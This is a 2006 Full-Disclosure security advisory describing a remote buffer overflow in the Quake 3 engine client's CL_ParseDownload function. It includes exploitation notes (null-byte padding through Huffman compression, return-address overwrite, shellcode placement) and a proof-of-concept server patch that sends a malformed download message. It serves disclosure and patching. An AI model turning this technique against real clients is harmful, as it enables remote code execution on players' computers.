####################################################################### Luigi Auriemma Application: Quake 3 engine http://www.idsoftware.com http://www.icculus.org/quake3/ Versions: Quake 3 <= 1.32c Icculus.org Quake 3 <= revision 795 other derived projects Games: exist many games which use the Quake 3 engine and probably they are all vulnerable but I'm not able and have no time to test them. An enough complete list of these games is available here: http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine Platforms: Windows, *nix, *BSD, Mac and others Bug: buffer-overflow in CL_ParseDownload Exploitation: remote, versus client Date: 02 Jun 2006 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== The Quake 3 engine is the famous game engine developed by id Software (http://www.idsoftware.com) in the far 1999 but is still one of the most used, licensed and played engines. It has been released open source under the GPL license some months ago and now it's mainly maintained by Icculus (http://www.icculus.org/quake3/) although exist many other derived projects. ####################################################################### ====== 2) Bug ====== The CL_ParseDownload function located in code/client/cl_parse.c is used by the clients for handling the download commands (svc_download) received from the server. The function uses a signed 16 bit number sent by the server for copying raw data from the network to the data buffer of 16384 (MAX_MSGLEN) bytes: void CL_ParseDownload ( msg_t *msg ) { int size; unsigned char data[MAX_MSGLEN]; ... size = MSG_ReadShort ( msg ); if (size > 0) MSG_ReadData( msg, data, size ); ... Some interesting details: The (reassembled) packets handled by Quake 3 can be max 16384 bytes but is possible to bypass this limit through the huffman compression used automatically and trasparently in the engine (thanx to Thilo Schulz). In short for exploiting this bug is enough to use 16384 NULL (0x00) bytes, which occupy a very small amount of space, followed by the usual "stuff" (return address to overwrite and shellcode). The data copied with the MSG_ReadData is raw so there are no bad bytes to avoid for the exploitation. Note that the svc_download can be sent to the client in any moment so the client can be attacked also immediately after the ending of the connect handshake (just the first server's message). ####################################################################### =========== 3) The Code =========== The server must be modified for sending the malformed svc_download command and is possible to use the following instructions which demonstrate how to overwrite the return address with 0x61616161. It's enough to place them in code/server/sv_client.c just after the "// send the gamestate" comment at about line 575: // send the gamestate int i; MSG_WriteByte( &msg, svc_download ); MSG_WriteShort( &msg, -1 ); // block != 0, for fast return MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy for(i = 0; i < 16384; i++) { // overwrite the data buffer MSG_WriteByte(&msg, 0x00); // 0x00 for saving space } for(i = 0; i < 32; i++) { // do the rest of the job MSG_WriteByte(&msg, 'a'); // return address: 0x61616161 } SV_SendMessageToClient( &msg, client ); return; ####################################################################### ====== 4) Fix ====== Icculus will fix the code soon. I have tried to contact id Software too but it's only time lost... The developers of the other derived projects and games have not been contacted (almost all the games are no longer supported and it's a bit long for me to find and contact each single developer of the other open source projects). ####################################################################### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/